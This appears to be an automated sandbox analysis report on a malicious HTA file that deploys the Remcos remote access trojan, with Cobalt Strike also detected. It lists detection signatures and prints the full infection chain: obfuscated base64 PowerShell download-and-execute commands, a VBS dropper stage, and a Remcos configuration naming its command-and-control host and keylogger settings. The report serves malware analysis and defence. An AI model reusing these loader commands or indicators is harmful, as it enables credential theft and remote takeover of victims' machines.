Edit tour
Windows
Analysis Report
sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta
Overview
General Information
Detection
Cobalt Strike, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7060 cmdline:
mshta.exe "C:\Users\ user\Deskt op\sweetne sswithgrea tnessiwthb estthingsw ithmebacki ckmegreatt hings.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 6408 cmdline:
"C:\Window s\system32 \cmd.exe" "/C pOwErS heLl -eX UNrEsTRiC TeD -nop -w 1 -c dEV icecReDENT iAlDePLoym ENt ; iN vOkE-exPRE SSion($(in VOke-eXpRe sSIOn('[sY STeM.tEXt. ENcodInG]' +[cHar]58+ [CHAr]58+' UTf8.gEtsT rInG([sYst em.cOnvErt ]'+[chAR]0 x3a+[cHAR] 58+'fRomBA Se64sTRiNG ('+[chaR]3 4+'JEU2UjV uZzltV0sgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgPSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB BREQtdHlwZ SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtTUV NQmVyZEVGS U5JdElvTiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAnW0Rsb EltcG9ydCg idVJMbW9uI iwgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgQ2h hclNldCA9I ENoYXJTZXQ uVW5pY29kZ SldcHVibGl jIHN0YXRpY yBleHRlcm4 gSW50UHRyI FVSTERvd25 sb2FkVG9Ga WxlKEludFB 0ciAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBTV WNYSWF1bmJ wLHN0cmluZ yAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICB3VCx zdHJpbmcgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgd2VibUN iUm9qWnksd WludCAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB YVXRRSUt0T XdsLEludFB 0ciAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBOa FpXcnNRcSk 7JyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtT kFNZSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA ielRXUFRRV 3oiICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 uYU1lU3BBY 2UgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgUk1 SYmloTWttd CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtUGF zc1RocnU7I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICRFNlI 1bmc5bVdLO jpVUkxEb3d ubG9hZFRvR mlsZSgwLCJ odHRwOi8vM jMuOTUuMjM 1LjI5LzQzO S93ZWFyZXV zaW5nZ29vZ GNvbXBhbml lc2ZvcmdpZ ml0aW5nYmV zdGhpbmdzZ m9ybWV0b2d ldC50SUYiL CIkZU52OkF QUERBVEFcd 2VhcmV1c2l uZ2dvb2Rjb 21wYW5pZXN mb3JnaWZpd GluZ2Jlc3R oaW5ncy52Y lMiLDAsMCk 7U3RhUnQtU 2xlZXAoMyk 7SU52T0tlL WV4UFJFc1N pT24gICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI iRlTlY6QVB QREFUQVx3Z WFyZXVzaW5 nZ29vZGNvb XBhbmllc2Z vcmdpZml0a W5nYmVzdGh pbmdzLnZiU yI='+[CHar ]34+'))')) )" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6344 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2916 cmdline:
pOwErSheLl -e X UN rEsTRiCTeD -no p -w 1 -c dEVice cReDENTiAl DePLoymENt ; iNvOk E-exPRESSi on($(inVOk e-eXpResSI On('[sYSTe M.tEXt.ENc odInG]'+[c Har]58+[CH Ar]58+'UTf 8.gEtsTrIn G([sYstem. cOnvErt]'+ [chAR]0x3a +[cHAR]58+ 'fRomBASe6 4sTRiNG('+ [chaR]34+' JEU2UjVuZz ltV0sgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg PSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBBRE QtdHlwZSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAtTUVNQm VyZEVGSU5J dElvTiAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AnW0RsbElt cG9ydCgidV JMbW9uIiwg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgQ2hhcl NldCA9IENo YXJTZXQuVW 5pY29kZSld cHVibGljIH N0YXRpYyBl eHRlcm4gSW 50UHRyIFVS TERvd25sb2 FkVG9GaWxl KEludFB0ci AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBTVWNY SWF1bmJwLH N0cmluZyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICB3VCxzdH JpbmcgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg d2VibUNiUm 9qWnksdWlu dCAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBYVX RRSUt0TXds LEludFB0ci AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBOaFpX cnNRcSk7Jy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtTkFN ZSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAiel RXUFRRV3oi ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1uYU 1lU3BBY2Ug ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgUk1SYm loTWttdCAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAtUGFzc1 RocnU7ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICRFNlI1bm c5bVdLOjpV UkxEb3dubG 9hZFRvRmls ZSgwLCJodH RwOi8vMjMu OTUuMjM1Lj I5LzQzOS93 ZWFyZXVzaW 5nZ29vZGNv bXBhbmllc2 ZvcmdpZml0 aW5nYmVzdG hpbmdzZm9y bWV0b2dldC 50SUYiLCIk ZU52OkFQUE RBVEFcd2Vh cmV1c2luZ2 dvb2Rjb21w YW5pZXNmb3 JnaWZpdGlu Z2Jlc3RoaW 5ncy52YlMi LDAsMCk7U3 RhUnQtU2xl ZXAoMyk7SU 52T0tlLWV4 UFJFc1NpT2 4gICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIiRl TlY6QVBQRE FUQVx3ZWFy ZXVzaW5nZ2 9vZGNvbXBh bmllc2Zvcm dpZml0aW5n YmVzdGhpbm dzLnZiUyI= '+[CHar]34 +'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 1772 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\xduntapu \xduntapu. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 404 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SBE59.tmp" "c:\Users \user\AppD ata\Local\ Temp\xdunt apu\CSC441 F3FFBBAD04 18BBB746B4 643CA251D. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 792 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\weare usinggoodc ompaniesfo rgifitingb esthings.v bS" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 6312 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $antimagis trical = ' JGVmZm9ydG xlc3MgPSAn aHR0cHM6Ly 9yZXMuY2xv dWRpbmFyeS 5jb20vZHp2 YWk4NnVoL2 ltYWdlL3Vw bG9hZC92MT czNDA1MDk5 MS91bnhhb2 9peWt4Zm13 OXBhbjR6MS 5qcGcgJzsk Y2FyZGlnYW 5zID0gTmV3 LU9iamVjdC BTeXN0ZW0u TmV0LldlYk NsaWVudDsk c3BoYWNlbG lhID0gJGNh cmRpZ2Fucy 5Eb3dubG9h ZERhdGEoJG VmZm9ydGxl c3MpOyRjb3 NtZWEgPSBb U3lzdGVtLl RleHQuRW5j b2RpbmddOj pVVEY4Lkdl dFN0cmluZy gkc3BoYWNl bGlhKTskZG 9vbXNheWVy cyA9ICc8PE JBU0U2NF9T VEFSVD4+Jz skcmVzdGFn bmF0aW9uID 0gJzw8QkFT RTY0X0VORD 4+JzskS2Fz aHViaWFuID 0gJGNvc21l YS5JbmRleE 9mKCRkb29t c2F5ZXJzKT skxZNjb25v bXVzID0gJG Nvc21lYS5J bmRleE9mKC RyZXN0YWdu YXRpb24pOy RLYXNodWJp YW4gLWdlID AgLWFuZCAk xZNjb25vbX VzIC1ndCAk S2FzaHViaW FuOyRLYXNo dWJpYW4gKz 0gJGRvb21z YXllcnMuTG VuZ3RoOyRv dmVybW9kdW xhdGVkID0g JMWTY29ub2 11cyAtICRL YXNodWJpYW 47JHJlZnJp Z2VyYXRvcn kgPSAkY29z bWVhLlN1Yn N0cmluZygk S2FzaHViaW FuLCAkb3Zl cm1vZHVsYX RlZCk7JHVu YW5jaG9yZW QgPSAtam9p biAoJHJlZn JpZ2VyYXRv cnkuVG9DaG FyQXJyYXko KSB8IEZvck VhY2gtT2Jq ZWN0IHsgJF 8gfSlbLTEu Li0oJHJlZn JpZ2VyYXRv cnkuTGVuZ3 RoKV07JHNw aXJpbGx1bX MgPSBbU3lz dGVtLkNvbn ZlcnRdOjpG cm9tQmFzZT Y0U3RyaW5n KCR1bmFuY2 hvcmVkKTsk eHlsb2xpdG UgPSBbU3lz dGVtLlJlZm xlY3Rpb24u QXNzZW1ibH ldOjpMb2Fk KCRzcGlyaW xsdW1zKTsk cGhvc3BoYX RpemVzID0g W2RubGliLk lPLkhvbWVd LkdldE1ldG hvZCgnVkFJ Jyk7JHBob3 NwaGF0aXpl cy5JbnZva2 UoJG51bGws IEAoJzAvd2 1NdEgvci9l ZS5ldHNhcC 8vOnNwdHRo JywgJyRjZW RhcnMnLCAn JGNlZGFycy csICckY2Vk YXJzJywgJ0 Nhc1BvbCcs ICckY2VkYX JzJywgJyRj ZWRhcnMnLC ckY2VkYXJz JywnJGNlZG FycycsJyRj ZWRhcnMnLC ckY2VkYXJz JywnJGNlZG FycycsJzEn LCckY2VkYX JzJywnJykp Ow==';$per iblem = [S ystem.Text .Encoding] ::UTF8.Get String([Sy stem.Conve rt]::FromB ase64Strin g($antimag istrical)) ;Invoke-Ex pression $ periblem MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7140 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - CasPol.exe (PID: 6456 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": ["submarrine.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GH3PRL", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
Click to see the 21 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 20 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |